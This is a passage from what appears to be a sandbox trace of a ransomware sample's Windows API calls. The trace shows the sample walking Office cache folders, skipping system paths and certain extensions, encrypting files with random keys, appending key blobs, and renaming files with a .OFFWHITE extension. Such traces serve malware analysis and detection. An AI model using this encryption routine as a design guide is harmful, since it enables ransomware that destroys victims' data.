hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.586] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x7976, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x7976, lpOverlapped=0x0) returned 1 [0087.586] GetProcessHeap () returned 0x500000 [0087.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.586] CloseHandle (hObject=0x21c) returned 1 [0087.589] GetProcessHeap () returned 0x500000 [0087.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.589] GetProcessHeap () returned 0x500000 [0087.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.589] GetProcessHeap () returned 0x500000 [0087.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.589] GetProcessHeap () returned 0x500000 [0087.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.589] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" [0087.589] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0087.589] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0087.590] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0087.590] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0087.590] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0087.590] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0087.590] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0087.591] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{91140000-003B-0000-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C" [0087.591] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.591] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.591] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0087.591] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0087.593] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.593] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0087.593] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0087.593] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.593] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0087.593] lstrcmpiW (lpString1="Office32WW.msi", lpString2=".") returned 1 [0087.593] lstrcmpiW (lpString1="Office32WW.msi", lpString2="..") returned 1 [0087.593] lstrcmpiW (lpString1="Office32WW.msi", lpString2="...") returned 1 [0087.593] lstrcmpiW (lpString1="Office32WW.msi", lpString2="windows") returned -1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$recycle.bin") returned 1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="rsa") returned -1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="ntuser.dat") returned 1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="programdata") returned -1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="appdata") returned 1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="program files") returned -1 [0087.594] lstrcmpiW (lpString1="Office32WW.msi", lpString2="program files (x86)") returned -1 [0087.594] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.594] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.msi" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0087.594] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.594] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.594] PathFindExtensionW (pszPath="Office32WW.msi") returned=".msi" [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0087.594] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0087.595] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0087.595] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0087.595] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0087.595] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2=".") returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="..") returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="...") returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="windows") returned -1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$recycle.bin") returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="rsa") returned -1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="ntuser.dat") returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="programdata") returned -1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="appdata") returned 1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="program files") returned -1 [0087.595] lstrcmpiW (lpString1="Office32WW.xml", lpString2="program files (x86)") returned -1 [0087.595] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.595] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0087.595] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.595] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.595] PathFindExtensionW (pszPath="Office32WW.xml") returned=".xml" [0087.595] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.595] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.596] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.596] lstrcmpiW (lpString1="Office32WW.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0087.596] GetProcessHeap () returned 0x500000 [0087.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d48 [0087.596] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.597] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=4274) returned 1 [0087.597] GetProcessHeap () returned 0x500000 [0087.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.597] GetProcessHeap () returned 0x500000 [0087.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.597] GetProcessHeap () returned 0x500000 [0087.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.597] GetProcessHeap () returned 0x500000 [0087.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.597] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.597] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.597] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.598] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.598] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.598] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.598] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.598] SetLastError (dwErrCode=0x0) [0087.598] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.600] GetLastError () returned 0x0 [0087.600] GetLastError () returned 0x0 [0087.600] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.601] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.601] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.601] WriteFile (in: hFile=0x21c, lpBuffer=0x547d48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d48*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.601] GetProcessHeap () returned 0x500000 [0087.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10b2) returned 0x5557b0 [0087.601] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.601] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x10b2, lpOverlapped=0x0) returned 1 [0087.603] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.603] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x10b2, lpOverlapped=0x0) returned 1 [0087.603] GetProcessHeap () returned 0x500000 [0087.603] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.603] CloseHandle (hObject=0x21c) returned 1 [0087.609] GetProcessHeap () returned 0x500000 [0087.609] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.609] GetProcessHeap () returned 0x500000 [0087.609] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.609] GetProcessHeap () returned 0x500000 [0087.609] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.609] GetProcessHeap () returned 0x500000 [0087.609] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.609] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0087.609] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE" [0087.609] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.offwhite")) returned 1 [0087.610] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2=".") returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="..") returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="...") returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="windows") returned -1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="$recycle.bin") returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="rsa") returned -1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="ntuser.dat") returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="programdata") returned -1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="appdata") returned 1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="program files") returned -1 [0087.610] lstrcmpiW (lpString1="ose.exe", lpString2="program files (x86)") returned -1 [0087.610] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.610] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="ose.exe" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" [0087.610] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.610] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.610] PathFindExtensionW (pszPath="ose.exe") returned=".exe" [0087.610] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0087.610] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2=".") returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="..") returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="...") returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="windows") returned -1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="$recycle.bin") returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="rsa") returned -1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="ntuser.dat") returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="programdata") returned -1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="appdata") returned 1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="program files") returned -1 [0087.611] lstrcmpiW (lpString1="osetup.dll", lpString2="program files (x86)") returned -1 [0087.611] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\" [0087.611] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="osetup.dll" | out: lpString1="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:/MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" [0087.611] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.611] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.611] PathFindExtensionW (pszPath="osetup.dll") returned=".dll" [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0087.611] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0087.611] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, 